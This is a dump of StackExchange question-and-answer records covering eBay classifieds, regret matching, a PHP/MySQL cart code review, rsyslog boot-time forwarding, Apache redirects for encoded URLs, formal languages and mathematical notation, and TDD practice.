_webapps.45449 | I want to leave feedback for an item I bought on eBay that was listed as a classified, but I can't even find the item in My eBay.Is it not possible to leave feedback for classifieds? | Can I leave feedback for classified item on eBay? | ebay | No you can't.From the Different ways of buying help article:When you see a Classified Ad listing, it means that you deal directly with the seller and buy the item at a fixed price. Because your Classified Ad purchase is outside of eBay, you won't be able to use eBay Feedback or eBay Buyer Protection. |
_cs.27915 | My question is the following: How to calculate the regret in practice?I am trying to implement the regret matching algorithm but I do not understand how to do it.First, I have $n$ players with the joint action space $\mathcal{A}=\{a_0, a_1,\cdots,a_m\}^n.$Then, I fix some period $T$. The action set $A^t\in\mathcal{A}$ is the action set chosen by players at time $t$. After the period $T$ (every player has chosen an action). So I get $u_i(A^t)$.Now the regret of player $i$ of not playing action $a_i$ in the past is: (here $A^t\oplus a_i$ denotes the strategy set obtained if player $i$ changed its strategy from $a'_i$ to $a_i$)$$\max\limits_{a_i\in A_i}\left\{\dfrac{1}{T}\sum_{t\leqslant T}\left(u_i(A^t\oplus a_i )-u_i(A^t)\right)\right\}.$$I do not understand how to calculate this summation. Why there is a max over the action $a_i\in A_i$? Should I calculate the regret of all actions in $A_i$ and calculate the maximum? Also, In Hart's paper, the maximum is $\max\{R, 0\}$. Why is there such a difference? I mean if the regret was: $\dfrac{1}{T}\sum_{t\leqslant T}\left(u_i(A^t\oplus a_i )-u_i(A^t)\right),$the calculation would be easy for me.The regret is defined in the following two papers [1] (see page 4, equation (2.1c)) and [2] (see page 3, section I, subsection B).A simple adaptive procedure leading to correlated equilibrium by S. Hart et al (2000)Distributed algorithms for approximating wireless network capacity by Michael Dinitz (2010)I would like to get some helps from you. Any suggestions step by step how to implement such an algorithm please? | How to implement the regret matching algorithm? | machine learning;game theory;learning theory | The index set of the max operation is $A_i$, the actions of player $i$. The formula says: take each such action $a_i \in A_i$ and compute its regret (with the sub-formula you say you can implement easily), and then take the maximum of those regrets. 
The reason for the $\max(R,0)$ is that actions with negative regrets are performing worse than the action currently chosen.

To implement this in code, just set a temporary variable $t$ to be 0. Now loop through the actions one by one, and for each action $a$, compute its regret $r$, and set $t$ as $\max(r,t)$. Note that this approach includes the $\max(R,0)$ operation; to do this without that, set $t$ initially to $-\infty$.
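A sketch of that computation (hypothetical helper names; `u` is player i's utility over a joint action profile and `history` is the list of past joint profiles): compute the clipped average regret for every action, and the outer max in the question's formula is then just the maximum over the returned values.

```python
def average_regrets(history, actions_i, i, u):
    # For each candidate action a of player i, average u(A^t (+) a) - u(A^t)
    # over the history, then clip negative regrets at 0 (the max(R, 0) step).
    T = len(history)
    regrets = {}
    for a in actions_i:
        total = 0.0
        for joint in history:
            deviated = list(joint)
            deviated[i] = a          # A^t (+) a_i : replace player i's action only
            total += u(tuple(deviated)) - u(tuple(joint))
        regrets[a] = max(total / T, 0.0)
    return regrets

# Toy single-player example: utility is just the chosen action's value.
hist = [(1,), (1,), (3,)]
u = lambda joint: float(joint[0])
print(average_regrets(hist, [1, 2, 3], 0, u))  # action 3 has the largest average regret
```

In Hart and Mas-Colell's regret-matching procedure, the next mixed strategy is then obtained by normalizing these clipped regrets, rather than by playing the argmax deterministically.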
_codereview.54018 | I wanted to create a cart where I can easily add some items or simply help someone at the other end over the phone. I decided to create a cart that would store everything in MySQL instead of using $_SESSION.

I did not code the whole cart, just in case this idea is very, very bad, but I wanted to show what I have done and get your feedback.

The MySQL table looks like the following:

CREATE TABLE IF NOT EXISTS `checkouts` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `SessionId` varchar(30) NOT NULL,
  `LastTouchTime` int(11) NOT NULL,
  `ObjectSerialized` text NOT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=0;

And this is the PHP class:

class Checkout
{
    static $KeepCartFor = 86400;
    static $dbCon = null;

    private $CheckoutId = null;
    private $Cart = array();
    private $PromoCode = null;
    private $SubTotal = 0.00;
    // Please note that I'm using GST as the first tax (the cart is kinda made for an easy swap between the Canada store and the USA)
    private $Gst = 0.00; // Goods And Services Tax
    private $Pst = 0.00; // Provincial Tax
    private $Shipping = array("Method"=>null,"Cost"=>0.00);
    private $Total = 0.00;
    private $Customer = array("FirstName"=>null,"LastName"=>null,"Email"=>null,"Home"=>null,"Work"=>null,"Cell"=>null,"Fax"=>null,"Company"=>null,"Address1"=>null,"Address2"=>null,"Address3"=>null,"Country"=>null,"State"=>null,"City"=>null,"Zip"=>null,"isShippingSameAsBilling"=>true,"ShipFirstName"=>null,"ShipLastName"=>null,"ShipCompany"=>null,"ShipAddress1"=>null,"ShipAddress2"=>null,"ShipAddress3"=>null,"ShipCountry"=>null,"ShipState"=>null,"ShipCity"=>null,"ShipZip"=>null);

    public function Cart_AddItem($WebsiteId, $Qty = 1)
    {
        if(!isset($this->Cart[$WebsiteId]))
        {
            $this->Cart[$WebsiteId] = $this->_GetProductDetail($WebsiteId);
            $this->Cart[$WebsiteId]['Qty'] = $Qty;
        }
        else
            $this->Cart[$WebsiteId]['Qty'] += $Qty;
        $this->Shipping = array("Method"=>null,"Cost"=>0.00);
    }

    public function Cart_RemoveItem($WebsiteId, $Qty = null)
    {
        if(isset($this->Cart[$WebsiteId]))
            if(is_null($Qty))
                unset($this->Cart[$WebsiteId]);
            else
            {
                if($this->Cart[$WebsiteId]['Qty'] - $Qty <= 0)
                    unset($this->Cart[$WebsiteId]);
                else
                    $this->Cart[$WebsiteId]['Qty'] -= $Qty;
            }
        $this->Shipping = array("Method"=>null,"Cost"=>0.00);
    }

    public function Cart_Emtpy()
    {
        $this->Cart = array();
        $this->SubTotal = 0.0;
        $this->Gst = 0.00;
        $this->Pst = 0.00;
        $this->Total = 0.00;
    }

    public function Cart_GetItems($WithDetail = false)
    {
        if(!$WithDetail)
        {
            foreach($this->Cart as $WebsiteId => $Vars)
            {
                $Return[$WebsiteId] = $Vars['Qty'];
            }
            return $Return;
        }
        else
            return $this->Cart;
    }

    private function _RefrechCartVars()
    {
        $this->SubTotal = 0.00;
        $this->Gst = 0.00;
        $this->Pst = 0.00;
        $this->Total = 0.00;
        foreach($this->Cart as $WebsiteId => $Vars)
        {
            $this->SubTotal += $Vars['ActualPrice']*$Vars['Qty'];
        }
        if(($this->Customer['isShippingSameAsBilling']?$this->Customer['Country']:$this->Customer['ShipCountry']) == "United States")
            if(($this->Customer['isShippingSameAsBilling']?$this->Customer['State']:$this->Customer['ShipState']) == "New York")
                $this->Gst = ($this->SubTotal * 0.07) + (is_null($this->Shipping['Method'])?0.00:$this->Shipping['Cost']);
        $this->Total = $this->SubTotal + $this->Gst + (is_null($this->Shipping['Method'])?0.00:$this->Shipping['Cost']);
    }

    private function _GetProductDetail($WebsiteId)
    {
        $GetProductDetail = Checkout::$dbCon->prepare("SELECT * FROM product WHERE id = :Id");
        $GetProductDetail->bindValue(':Id', $WebsiteId);
        try{
            $GetProductDetail->execute();
        }catch(PDOException $e) {die("Error Getting Product Detail: ".$e->getMessage());}
        $PD = $GetProductDetail->fetch(PDO::FETCH_ASSOC);
        $Return['Brand'] = $PD['brand'];
        $Return['ModelNumber'] = $PD['SKU'];
        $Return['Title'] = $PD['title'];
        $Return['ActualPrice'] = ($PD['pricingtype'] == 'promo' && strtotime($PD['enddate']) >= time()?$PD['promoprice']:$PD['price']);
        $Return['MSRP'] = $PD['originalprice'];
        $Return['PictureUrl'] = $PD['picturelink'];
        $Return['Weight'] = $PD['weight'];
        $Return['DimensionalWeight'] = number_format($PD['height']*$PD['length']*$PD['width']/166, 2);
        $Return['CalculatedWeight'] = ($Return['Weight'] >= $Return['DimensionalWeight']?$Return['Weight']:$Return['DimensionalWeight']);
        return $Return;
    }

    public function __construct()
    {
        // Check if we have a checkout already
        $Prepare = Checkout::$dbCon->prepare("SELECT * FROM checkouts WHERE SessionId = :SessionId AND LastTouchTime >= :Time ORDER BY Id DESC");
        $Prepare->bindValue(':SessionId', session_id());
        $Prepare->bindValue(':Time', time()-self::$KeepCartFor);
        try{
            $Prepare->execute();
            if($Prepare->rowCount() != 0)
            {
                $Checkout = $Prepare->fetch(PDO::FETCH_ASSOC);
                $this->CheckoutId = $Checkout['Id'];
                $ThisVar = unserialize($Checkout['ObjectSerialized']);
                foreach($ThisVar as $Key => $Val)
                    $this->$Key = $Val;
                $this->CheckoutId = $Checkout['Id'];
            }
        }catch(PDOException $e) {
            die("Error Getting Checkout From Db: ".$e->getMessage());
        }
    }

    public function __destruct()
    {
        if(is_null($this->CheckoutId))
        {
            // Insert Checkout In Mysql
            $CheckWhatIsNextId = Checkout::$dbCon->prepare("SELECT Id FROM checkouts ORDER BY Id DESC LIMIT 0,1");
            $CheckWhatIsNextId->execute();
            $NextId = $CheckWhatIsNextId->fetch(PDO::FETCH_ASSOC);
            $this->CheckoutId = $NextId['Id'];
            $InsertCheckout = Checkout::$dbCon->prepare("INSERT INTO checkouts (`SessionId`,`LastTouchTime`,`ObjectSerialized`) VALUES(:SessionId,:LastTouchTime,:ObjectSer);");
            $InsertCheckout->bindValue(':SessionId', session_id());
            $InsertCheckout->bindValue(':LastTouchTime', time());
            $InsertCheckout->bindValue(':ObjectSer', serialize($this));
            try{
                $InsertCheckout->execute();
            }catch(PDOException $e) {
                die("Error SavingCart In Db: ".$e->getMessage());
            }
        }
        else
        {
            $UpdateCheckout = Checkout::$dbCon->prepare("UPDATE `checkouts` SET `LastTouchTime` = :Time, ObjectSerialized = :Object WHERE `Id` = :Id;");
            $UpdateCheckout->bindValue(':Time', time());
            $UpdateCheckout->bindValue(':Object', serialize($this));
            $UpdateCheckout->bindValue(':Id', $this->CheckoutId);
            try{
                $UpdateCheckout->execute();
            }catch(PDOException $e) {
                die("Error SavingCart In Db: ".$e->getMessage());
            }
        }
    }
}

And this next class is simply a little class for my laziness in remembering the DSN of MySQL, the port and all that for PDO objects:

class dbCon extends PDO
{
    public function __construct($host, $port, $user, $pass, $dbName = null)
    {
        $pdo_options[PDO::ATTR_ERRMODE] = PDO::ERRMODE_EXCEPTION;
        $dsn = 'mysql:host='.$host.';port='.$port.';';
        if(!is_null($dbName))
            $dsn .= 'dbname='.$dbName;
        try{
            parent::__construct($dsn, $user, $pass, $pdo_options);
        }catch(PDOException $e){
            die("Error Connecting To Database: ".$e->getMessage());
        }
    }
}

Technically, on any page I can access the cart with only 2 lines of code:

Checkout::$dbCon = new dbCon("127.0.0.1", 3306, "UserName", "Password", "DatabaseName");
$Checkout = new Checkout();

Maybe there is some security issue that I'm not thinking about, or perhaps I should do something different. Let me know what you think. | A cart that uses SessionID | php;mysql | Database

Normalize your database! Don't keep a string of serialized objects in the database; that's extremely brittle and extremely unhelpful in all but the most simple cases. Instead, you should have 3 tables (two of which you already have):

1. items - Table that holds information about items; includes name, price, etc.
   Key column: item_id.
2. carts (renamed from checkout) - Table that holds information about users' carts. There's a 1:1 relationship between carts and checkouts: a single cart can't be checked out more than once, and a single checkout doesn't apply to multiple carts, so it makes sense to have them in the same table. Has the cart's ID, the user's ID (in your case, SessionID) and extra information (not items) like LastTouchTime.
   Key column: cart_id.
3. items-in-carts - Items and carts have a many-to-many relationship, also known as an n:m relationship. One cart can have multiple items in it, and the same item can be in multiple carts. So we have a third table that ties the two together. All the table has is two columns: item_id, cart_id.
Here's an example of a many-to-many architecture.

PHP

- Naming convention - ClassNames should be CamelCaps; $variableNames and methodNames() should be lowercase camelCase. Don't mix caps with underscores (for example, Cart_AddItem should be just addItem; it's clear we're talking about the cart here, isn't it?).
- Use of static variables and methods - Don't. Static variables and methods are global, which means that by definition they make your application less stable, harder to test and maintain, and harder to read. Please don't.
- __construct() function should always be first - The first thing I read about a class is how it's constructed.
- Implicit dependencies - Your __construct() says it doesn't need any parameters, but that's a lie. It actually needs a database connection, and you're using a global to get it. That's what I mean by "don't use static variables". This is a better approach:

  public function __construct(DBCon $dbCon) {

- Consistent spacing - Sometimes you use $var->method() and sometimes $var -> method(). Make up your mind, and stick with it. There are free tools that can do this job for you!
- Naming of things - Why is it called a Checkout? What I see is a Cart, and that's how it should be called. If you can check out a cart, you should have a method $cart->checkout(...). Your methods are redundantly long: Cart_Empty() can be empty(), Cart_AddItem() can be addItem().
- Too much going on in one class - Your cart uses Items, right? Why not make an Item class?
- What's the purpose of the dbCon object? - Why are you placing another abstraction on top of PDO? What problem are you solving here? In 99% of applications (and I bet including yours), you only ever need a single database connection, so what's the point of wrapping it in a class that hinders readability? (I know PDO, but I see dbCon and I have no idea what it is until I dive in and read the code.)

All in all, I'd try to adopt a more OOP approach: create more classes, increase the interaction between objects.
Get rid of the globals and statics.

Good luck :) |
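The three-table layout described in this answer can be sketched as follows (an illustrative Python/SQLite sketch; only the items / carts / items-in-carts tables and their key columns come from the answer itself — the remaining column names are assumptions):

```python
import sqlite3

# In-memory database just to demonstrate the normalized schema.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE items (
        item_id INTEGER PRIMARY KEY,
        name    TEXT NOT NULL,
        price   REAL NOT NULL
    );
    CREATE TABLE carts (
        cart_id         INTEGER PRIMARY KEY,
        session_id      TEXT NOT NULL,
        last_touch_time INTEGER NOT NULL
    );
    -- join table for the n:m relationship between items and carts
    CREATE TABLE items_in_carts (
        item_id INTEGER NOT NULL REFERENCES items(item_id),
        cart_id INTEGER NOT NULL REFERENCES carts(cart_id),
        PRIMARY KEY (item_id, cart_id)
    );
""")
```

Reading a cart's contents then becomes a plain join through the items_in_carts table instead of unserializing a blob.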
_softwareengineering.132288 | We are using SQL Source Control 3, SQL Compare, SQL Data Compare from RedGate, Mercurial repositories, TeamCity and a set of 4 environments including production. I am working on getting us to a dedicated environment per developer, but for at least the next 6 months we are stuck with a shared model. To summarize our current system, we have a DEV SQL server where developers first make changes/additions. They commit their changes through SQL Source Control to a local hgdev repository. When they execute an hg push to the main repository, TeamCity listens for that and then (among other things) pushes the hgdev repository to hgrc. Another TeamCity process listens for that, does a pull from hgrc and deploys the latest to a QA SQL Server where regression and integration tests are run. When those are passed, a push from hgrc to hgprod occurs. We do a compare of hgprod to our PREPROD SQL Server and generate deployment/rollback scripts for our production release.

Separate from the above, we have database Hot Fixes that will need to be applied in between releases. The process there is for our Operations team to make changes on the PreProd database and then, after testing, to use SQL Source Control to commit their hot fix changes to hgprod from the PREPROD database, and then do a compare from hgprod to PRODUCTION, create deployment scripts and run them on PRODUCTION.

If we were in a dedicated-database-per-developer model, we could simply automatically push hgprod back to hgdev and merge in the hot fix change (through TeamCity monitoring for hgprod checkins), and then developers would pick it up and merge it to their local repository and database periodically. However, given that with a shared model the DEV database itself is the source of all changes, this won't work.
Pushing hotfixes back to hgdev will show up in SQL Source Control as being different from the DEV SQL Server, and therefore we need to overwrite the repository with the change from the DEV SQL Server. My only workaround so far is to just have OPS assign a developer the hotfix ticket with a script attached, and then we run their hotfixes against DEV ourselves to merge them back in. I'm not happy with that solution. Other than working faster to get to a dedicated environment, are there other ways to keep this loop going automatically? | How do I Integrate Production Database Hot Fixes into Shared Database Development model? | version control;deployment;database development | null
_datascience.5313 | In an assignment we are given macroeconomic indicators like GDP, the Consumer Price Index, the Producer Price Index and the Industrial Production Index. Also we are given crude oil and sugar prices, and FMCG sales. We are required to forecast the next quarter's sales and give a model. As I'm new to this subject, I don't know where to start with it, or what to read. Can anyone provide me with some examples of what to do, or any PDFs which might be helpful? | Forecasting sales and creating model | predictive modeling;forecast | null
_unix.246076 | I configured rsyslog to send logs to a central logging server like this:

*.* @@192.168.1.20
$ActionExecOnlyWhenPreviousIsSuspended on
& @@192.168.1.21
& /var/log/failover
$ActionExecOnlyWhenPreviousIsSuspended off

It works well, except when the machine is booting. When the virtual machine starts, and for approximately twenty seconds after it starts, no messages are sent to 192.168.1.20 or 192.168.1.21. However, /var/log/failover contains all those lost messages.

As a test, I started the machine and entered by hand:

$ logger 1
$ logger 2
$ logger 3
...

The first central logging server contains just:

Nov 28 13:57:40 demo arsene: 10

The second logging server contains no messages from the demo machine. Finally, /var/log/failover on the demo machine contains:

Nov 28 13:57:10 demo rsyslogd: [origin software="rsyslogd" swVersion="7.4.4" x-pid="361" x-info="http://www.rsyslog.com"] start
Nov 28 13:57:10 demo rsyslogd: rsyslogd's groupid changed to 104
Nov 28 13:57:10 demo rsyslogd: rsyslogd's userid changed to 101
... # more than a hundred usual messages from the kernel
Nov 28 13:57:20 demo kernel: [ 12.127981] random: nonblocking pool is initialized
Nov 28 13:57:21 demo arsene: 1
Nov 28 13:57:22 demo arsene: 2
Nov 28 13:57:23 demo arsene: 3
Nov 28 13:57:25 demo arsene: 4
Nov 28 13:57:27 demo arsene: 5
Nov 28 13:57:28 demo arsene: 6
Nov 28 13:57:30 demo arsene: 7
Nov 28 13:57:32 demo arsene: 8
Nov 28 13:57:37 demo arsene: 9

I encounter this issue on both Ubuntu and Debian virtual machines.

Additional notes:

- The network connectivity looks fine.
If I try ping 192.168.1.20 and curl google.com during the period when the log messages are not sent to the log server, both ping and curl succeed.
- Disabling the firewall of the logging server has no effect.
- Running tcpdump shows that nothing is being sent to the log server during the twenty-second period.
- Other Ubuntu machines on the network (which were deployed using a very different approach) report their logs to the logging server fine, including during the boot.
- By comparing the faulty machines to the correct ones, I noticed a version mismatch (7 vs. 8) for rsyslogd. Upgrading rsyslogd on the faulty machines to version 8.14.0 hasn't fixed the issue, but now I see the following message a bit after the log reporting starts working:

Nov 29 02:18:39 demo rsyslogd-2359: action 'action 11' resumed (module 'builtin:omfwd') [v8.14.0 try http://www.rsyslog.com/e/2359 ]

- diff shows that the /etc/rsyslog.conf and /etc/rsyslog.d/*.conf files are exactly the same between the new faulty machines and the old working ones.
- An apt-get update, apt-get upgrade and even apt-get dist-upgrade haven't fixed the problem. | Why is syslogd not reporting messages to remote server during and just after the boot? | rsyslog | As @ThomasDickey said, networking may not be completely started when userland programs start to run. Many enterprise ethernet switches don't accept packets for a number of seconds after an interface comes up, as they try to negotiate spanning tree settings.

rsyslog has an ActionResumeInterval setting that is 30 seconds by default. If you set it to a smaller value before any directives that use TCP connections, that will increase the retry rate, and the connections ought to get completed more quickly.

There are also additional options you can set to ensure that early messages which are not sent immediately get delivered as soon as the connection is ready.
For instance, you can use options similar to:

$ActionResumeInterval 5
$ActionQueueType disk
$WorkDirectory /var/spool/rsyslog
$ActionQueueFilename actionRq
$ActionQueueMaxDiskSpace 1m
$ActionQueueSize 4000
$ActionQueueTimeoutEnqueue 0
$ActionResumeRetryCount -1
_webmaster.99608 | I have a .htaccess file at the end of which I created some 301 redirects. For example:

Redirect 301 /site-building-from-home /
Redirect 301 /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D /

For some reason all redirects with an English alias (say, site-building-from-home) work, but all those with encoded aliases (Hebrew-to-machine-language) don't.

Do we have an Apache-directives/PCRE expert who can explain this phenomenon?

(Note: I used / instead of a domain-name+TLD for flexibility considerations.) | Encoded 301 redirects don't work, only english one does | htaccess;redirects | As it states in the Apache docs for a mod_alias Redirect:

The old URL-path is a case-sensitive (%-decoded) path ...

So, assuming /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D is the actual request as sent from the client, you will need to match against the literal, percent-decoded (aka URL-decoded) text in the Redirect directive. From your example this would be:

Redirect /מזין-תכנים /

(Make sure your .htaccess file is UTF-8 encoded.)

If you want to match the percent-encoded URL, as sent from the client, then you will need to use mod_rewrite and match against the THE_REQUEST server variable (which is not percent-decoded). For example:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D\ HTTP/
RewriteRule ^ / [R=301,L]

You will need to enable the rewrite engine earlier in your code if it isn't already, i.e. RewriteEngine On.

However, if you change to using mod_rewrite redirects then it is strongly recommended to change your mod_alias Redirects to use mod_rewrite as well, in order to avoid unexpected conflicts.
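The decoding behaviour that mod_alias applies to the URL-path can be checked directly (an illustrative Python check, not part of the original answer):

```python
from urllib.parse import unquote

# The percent-encoded path exactly as the client sends it.
encoded = "%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D"

# mod_alias compares the Redirect's URL-path against this decoded form,
# which is why the directive must contain the literal (here, Hebrew) text.
decoded = unquote(encoded)
print(decoded)
```

Whatever `unquote` prints here is the literal text the `Redirect` directive has to contain for the match to succeed.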
_codereview.60670 | Find ceiling and floor in the BinarySearchTree. Looking for code review, optimizations and best practices.

public class FloorCeiling {

    private TreeNode root;

    public FloorCeiling(List<Integer> items) {
        create(items);
    }

    private void create (List<Integer> items) {
        if (items.isEmpty()) {
            throw new NullPointerException("The items array is empty.");
        }
        root = new TreeNode(items.get(0));
        final Queue<TreeNode> queue = new LinkedList<TreeNode>();
        queue.add(root);
        final int half = items.size() / 2;
        for (int i = 0; i < half; i++) {
            if (items.get(i) != null) {
                final TreeNode current = queue.poll();
                final int left = 2 * i + 1;
                final int right = 2 * i + 2;
                if (items.get(left) != null) {
                    current.left = new TreeNode(items.get(left));
                    queue.add(current.left);
                }
                if (right < items.size() && items.get(right) != null) {
                    current.right = new TreeNode(items.get(right));
                    queue.add(current.right);
                }
            }
        }
    }

    private static class TreeNode {
        private TreeNode left;
        private int item;
        private TreeNode right;

        TreeNode(int item) {
            this.item = item;
        }
    }

    private static class IntegerObj {
        Integer obj = null;
    }

    public int ceiling (int val) {
        IntegerObj iobj = new IntegerObj();
        recurseCeiling(root, iobj, val);
        return iobj.obj;
    }

    public int floor (int val) {
        IntegerObj iobj = new IntegerObj();
        recurseFloor(root, iobj, val);
        return iobj.obj;
    }

    private void recurseCeiling (TreeNode node, IntegerObj iobj, int value) {
        if (node == null) {
            return;
        }
        if (value <= node.item) {
            iobj.obj = node.item;
            recurseCeiling(node.left, iobj, value);
        } else {
            recurseCeiling(node.right, iobj, value);
        }
    }

    private void recurseFloor (TreeNode node, IntegerObj iobj, int value) {
        if (node == null) {
            return;
        }
        if (value < node.item) {
            recurseFloor (node.left, iobj, value);
        } else {
            iobj.obj = node.item;
            recurseFloor (node.right, iobj, value);
        }
    }
}

public class FloorCeilingTest {

    @Test
    public void test1() {
        FloorCeiling fc1 = new FloorCeiling(Arrays.asList(100, 50, 150, 25, 75, 125, 175));
        assertEquals(25, fc1.ceiling(20));
        assertEquals(50, fc1.ceiling(30));
        assertEquals(75, fc1.ceiling(70));
        assertEquals(100, fc1.ceiling(90));
        assertEquals(125, fc1.ceiling(120));
        assertEquals(150, fc1.ceiling(145));
        assertEquals(175, fc1.ceiling(160));
    }

    @Test
    public void test2() {
        FloorCeiling fc2 = new FloorCeiling(Arrays.asList(100, 50, 150, 25, 75, 125, 175));
        assertEquals(25, fc2.floor(27));
        assertEquals(50, fc2.floor(55));
        assertEquals(75, fc2.floor(78));
        assertEquals(100, fc2.floor(110));
        assertEquals(125, fc2.floor(128));
        assertEquals(150, fc2.floor(160));
        assertEquals(175, fc2.floor(180));
    }
} | Find floor and ceiling in the BST | java;tree | null
_unix.340984 | It's nice to be able to fling the mouse up and right, not having to bother with precise targeting, and click. If your hand's already on the mouse, this is easier than switching back to the keyboard to press Alt+F4 for a quick window close.

E.g. Windows (since at least 95) has made this work, although at times it had very annoying almost-maximized window defaults that interfered with this quite a bit in some applications. Nonetheless, actual maximized windows have always capitalized on Fitts's Law in their design this way.

Is there any way to get this behaviour in Linux Mint MATE 18.1? (Marco is the window manager, it seems.) As it is, maximized windows will not close with a click in the upper-right corner. One has to precisely back up a few pixels to activate the X and close it. | Getting Mint MATE (Marco?) to put the window-close X in the actual corner, not just near it | linux mint;window manager;mate | null
_cs.65629 | Question: Are there any introductory texts in formal language or programming language theory which discuss how to apply it to the study of optimal notation?

In particular, I am interested to learn what stack-languages, parse trees, and indices are, and how to predict when a certain type of notation will lead to exponential redundancy.

I have basically no background in either formal language/grammar or programming theory, since as a math major the only computer science I learned was algorithms and graph theory, as well as very modest smidgens of complexity theory and Boolean functions. Thus, if the only books which discuss this are not introductory, I would be grateful for answers that both list such books discussing exponential notation blow-up as well as introductory books that will prepare for the books which directly address my question.

Context: This question is inspired primarily by an answer on Physics.SE, which says that:

"It is very easy to prove (rigorously) that there is no parentheses notation which reproduces tensor index contractions, because parentheses are parsed by a stack-language (context free grammar in Chomsky's classification) while indices cannot be parsed this way, because they include general graphs. The parentheses generate parse trees, and you always have exponentially many maximal trees inside any graph, so there is exponential redundancy in the notation."

Throughout the rest of the answer, other examples of exponential notation blow-up are discussed, for example with Petri Nets in computational biology.

There are also other instances where mathematical notation is difficult to parse, for example as mentioned here when functions and functions applied to the argument are not distinguished clearly. This can become especially confusing when the function becomes the argument and the argument becomes the function, e.g. here. | Can formal languages be used to study mathematical notation?
| formal languages;reference request;formal grammars;programming languages | Formal language theory does not concern itself with the semantics of the language. That might seem odd, since we tend to think of language as a mechanism for communicating something, but if you think about it, there are really two levels of understanding language (at least): the surface level, in which the language is a stream of lexemes, and the underlying denotational level, which is more or less divorced from the surface representation. (Chomsky posited an intermediate transformational level to get around some limitations with CFGs, but that's not relevant here.) Consequently, it is possible to say the same thing in different languages; Chomsky is not a Whorfian. (See Wikipedia for a brief overview, with some references.)

Nonetheless, a context-free grammar is not sufficient to distinguish correct and incorrect utterances. Chomsky offered the classic example: "Colourless green ideas sleep furiously" (which he spelled incorrectly, being a USian). See Wikipedia, again. (Unfortunately Wikipedia doesn't have a Canadian English version.) The precise division between syntactic and semantic errors is hard, if not impossible, to demarcate, and there has been considerable debate over this topic in CS fields, which I'm not going to even attempt to discuss here because I always get into trouble when I do. However, we can identify one classic grammatical rule present in many human languages: noun/verb agreement. "I disagrees" seems to me to be a syntactic error in the sense that I understand the intent of the utterance perfectly but also recognize it as erroneous. But this syntactic issue can only be captured by a context-free grammar if we enumerate all possible agreements.
That is, we can write something vaguely like $S \to NP_{sing} VP_{sing} | NP_{plural} VP_{plural}$, but it is easy to see how the enumeration could get out of hand in languages with more complicated agreement rules (gender, for example).

The problem with context-free grammars is that they are context-free, although you shouldn't take that description too seriously, because it is easy to fall into the trap of misinterpreting technical use of common words (which, I might argue, is the basis of this question in the first place). That means that a nonterminal (like $NP$ above) must derive exactly the same set of phrases regardless of the context in which it appears. So we could not write, for example, $S \to NP_X VP_X$ with the understanding that $X$ needs to be filled in the same way in both expansions. (This is one of the issues with which transformational grammar attempted to grapple.)

That is exactly the problem with tensor index contractions. A tensor index contraction places a particular requirement on the use of index variables: an index variable must be used exactly twice, in which case it cannot be on the left-hand side, or exactly once, in which case it must be on the left-hand side. (Since I'm not a physicist, I'd be tempted to collapse that into saying that an index variable must appear exactly twice in all. But there is a semantic distinction between free and placeholder variables, which is important to the understanding of the expression.) Here, there is no simple finite collection of index variables and no limit to the number of placeholders used. Moreover, renaming placeholders does not affect semantics provided that the new names are not used elsewhere in the expression, and one might expect the formal language description to capture that fact.

It is in fact possible to rigorously prove the assertion that context-free grammars cannot capture contextual agreement, as in the previous examples.
I think that has something to do with what the quoted claim is asserting. Depending on how omnicurious you are, you might find it interesting to learn more, but I don't think it will end up being particularly relevant to the philosophical or physical insights you seem to be seeking.The other linked articles, about unfortunate surface forms in mathematical notation, are simply anecdotal; none of them, as far as I can see, makes any deep or even superficial point relevant to formal language theory, just as the possibly famous joke that one man's fish is another man's poisson is not even vaguely insightful about romance linguistics, but it's still funny (IMO). |
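To make the index-agreement constraint concrete, here is a hypothetical checker for the "exactly once (free, on the left) or exactly twice (summed, not on the left)" rule described above (illustrative Python with made-up input conventions — each tensor factor is given as a string of index letters, e.g. ["ij", "jk"] for A_ij B_jk; none of this is from the original answer):

```python
from collections import Counter

def valid_contraction(lhs_indices, rhs_terms):
    """Check the index rule: an index used twice on the right must be summed
    (absent from the left); an index used once must appear on the left."""
    counts = Counter(ch for term in rhs_terms for ch in term)
    for idx, n in counts.items():
        if n == 1:
            if idx not in lhs_indices:   # free index must appear on the left
                return False
        elif n == 2:
            if idx in lhs_indices:       # summed index must not appear on the left
                return False
        else:                            # three or more uses is ill-formed
            return False
    # every left-hand index must actually occur on the right
    return set(lhs_indices) <= set(counts)
```

Note that the checker needs a global count over the whole expression — exactly the kind of cross-term agreement a context-free grammar cannot enforce.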
_softwareengineering.86099 | I have been designing and developing code TDD-style for a long time. What disturbs me about TDD is writing tests for code that does not contain any business logic or interesting behaviour. I know TDD is a design activity more than testing, but sometimes I feel it's useless to write tests in these scenarios.

For example, I have a simple scenario like "When the user clicks the check button, it should check the file's validity". For this scenario I usually start writing tests for the presenter/controller class like the one below.

@Test
public void when_user_clicks_check_it_should_check_selected_file_validity() {
    MediaService service = mock(MediaService.class);
    View view = mock(View.class);
    when(view.getSelectedFile()).thenReturn("c:\\Dir\\file.avi");
    MediaController controller = new MediaController(service, view);
    controller.check();
    verify(service).check("c:\\Dir\\file.avi");
}

As you can see, there is no design decision or interesting code to verify behaviour; I am testing that values from the view are passed to MediaService. I usually write, but don't like, these kinds of tests. What do you do in these situations? Do you write tests all the time?

UPDATE: I have changed the test name and code after complaints. Some users said that you should write tests for trivial cases like this so that in the future someone might add interesting behaviour. But what about "Code for today, design for tomorrow"? If someone, including myself, adds more interesting code in the future, the test can be created for it then. Why should I do it now for the trivial cases? | Do you write unit tests for all the time in TDD? | unit testing;language agnostic;tdd | I don't aim for 100% code coverage. And I usually don't write tests of methods which will obviously not contain any business logic and/or more than a few lines of code. But I still write unit tests (using TDD) of methods which do not seem that complex.
This is mostly because I like to have the unit test already there when coming back to that code months or even years later and wanting to make it more complex. It's always easier to extend existing tests than having to build it all from scratch. As Noufal said, it's subjective. My advice is to write the tests if you think the method is a bit complex or has the potential to get more complex.
